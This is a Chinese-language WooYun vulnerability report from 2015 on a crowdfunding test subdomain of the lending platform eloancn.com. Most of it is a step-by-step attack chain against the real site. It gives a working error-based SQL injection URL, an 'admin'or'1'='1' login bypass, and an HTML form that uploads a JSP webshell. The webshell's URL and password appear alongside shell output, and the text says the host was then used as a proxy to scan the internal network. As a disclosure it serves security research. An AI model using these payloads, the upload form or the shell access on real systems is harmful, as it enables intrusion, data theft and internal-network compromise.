当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117324

漏洞标题:翼龙贷某分站注入/导致getshell/威胁内网安全

相关厂商:eloancn.com

漏洞作者: 小饼仔

提交时间:2015-05-31 17:37

修复时间:2015-06-05 17:38

公开时间:2015-06-05 17:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-31: 细节已通知厂商并且等待厂商处理中
2015-06-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

很久没提漏洞了,看到job上有你们的招聘广告,就测了下~

详细说明:

引用下公司简介

翼龙贷作为联想控股战略投资企业,是国内首倡“同城O2O”模式的网络借贷平台。翼龙贷致力于成为一家卓越的互联网金融企业,为三农金融、普惠金融添加助力。
公司地址:北京市海淀区上地信息路甲28号科实大厦
公司主页:http://www.eloancn.com


还有这个...

7.png


回到正题
扫了下 eloancn.com 的子域名,发现了一个测试站点 http://z.eloancn.com/

1.png


看样子好像是新的业务,翼龙众筹,还在测试。
这系统到处都是注入
http://z.eloancn.com/projInfoController.do?projinfo&projectid=3f58a6afef0f447f8f9bf6512c69cb34' and '234'='234
返回正常

2.png


http://z.eloancn.com/projInfoController.do?projinfo&projectid=3f58a6afef0f447f8f9bf6512c69cb34' and '234'='233
返回null

3.png


这里可以报错注入
获取一下user和version

http://z.eloancn.com/projInfoController.do?projinfo&projectid=3f58a6afef0f447f8f9bf6512c69cb34' and (select 1 from (select count(*),concat( user(), ' | ', version() ,floor(rand(0)*2))x from information_schema.tables group by x)a) --+


得到
[email protected] | 5.6.20-log1
剩下的丢工具里跑就行了,这里就不贴了
之后又找了找后台
发现后台登陆地址

http://z.eloancn.com/loginController.do?login


因为存在注入,直接 admin'or'1'='1进入系统

5.png


常言道,不拿shell的漏洞不是好漏洞,然后找了找有没上传的地方,有几处上传的,大部分都是传到 img.eloancn.com 这个图片服务器上去了,又找了找,发现在系统管理 - 图标管理这个地方有添加图标,这个地方是上传到本服务器目录下的。
试了一下,用到了jquery.uploadify-3.1.js这个js,但是404。
没有关系,分析了下对应上传的js代码,需要传几个参数
本地构造表单

<html>
<head>
<title>Untitled Document</title>
</head>

<body>
<form action="http://z.eloancn.com/iconController.do?saveIcon&jsessionid=" method="post" enctype="multipart/form-data" name="form1">
<input name="iconName" type="text" value="nameaa">
<input name="iconType" type="text" value="2">
<input name="file_upload" type="file" >
<input name="submit" type="submit" id="submit" value="Submit">
</form>
</body>
</html>


上传shell,提示成功

6.png


在图标那可以看到shell对应的地址
http://z.eloancn.com/plug-in/accordion/images/cececece.jsp 密码 sdfaer24dva34

漏洞证明:

ifconfig 是内网

[/usr/local/tomcat/webapps/ROOT/]$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:25:90:08:72:74
inet addr:192.168.10.192 Bcast:192.168.10.255 Mask:255.255.255.0
inet6 addr: fe80::225:90ff:fe08:7274/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5600384 errors:0 dropped:670 overruns:0 frame:0
TX packets:5323048 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2250961538 (2.0 GiB) TX bytes:1550620055 (1.4 GiB)
Interrupt:16 Memory:fbce0000-fbd00000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:18509 errors:0 dropped:0 overruns:0 frame:0
TX packets:18509 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4075986 (3.8 MiB) TX bytes:4075986 (3.8 MiB)


数据库配置文件等敏感信息就不贴了
因为是个测试系统,所以信息不多
然后又看了下/usr/local/下几个tomcat下部署的项目,发现tomcat3下的部署的是主站http://www.eloancn.com/的测试代码

8_副本.jpg


简单的看了下你们的代码,电话身份证号用了DES,密码MD5,加了salt。
看了看密码重置的逻辑,拿线上测了下,发现不太对劲,返回结果和测试代码不一样,可能是和线上代码不一样。就没继续测了。
然后拿了这台机器做了个代理,扫了下192.16.10.0/24这个网段的80和8080端口
http://192.168.10.154 会跳到www主页
然后 phpinfo

phpinfo_副本.png


路由器

dlink router_副本.png


9.jpg


还有一些,就不贴了
ps.
怕影响你们线上环境,就不继续深入了。没有做任何破坏,下载的代码已经删除

修复方案:

删除下我上传的shell
测试环境能不对外就不对外吧

版权声明:转载请注明来源 小饼仔@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-05 17:38

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2015-06-08:感谢 @小饼仔 这个算是运维不当吧,没有加上安全机制

2015-06-08:这个在测试期,后面会加上系统安全过滤模块。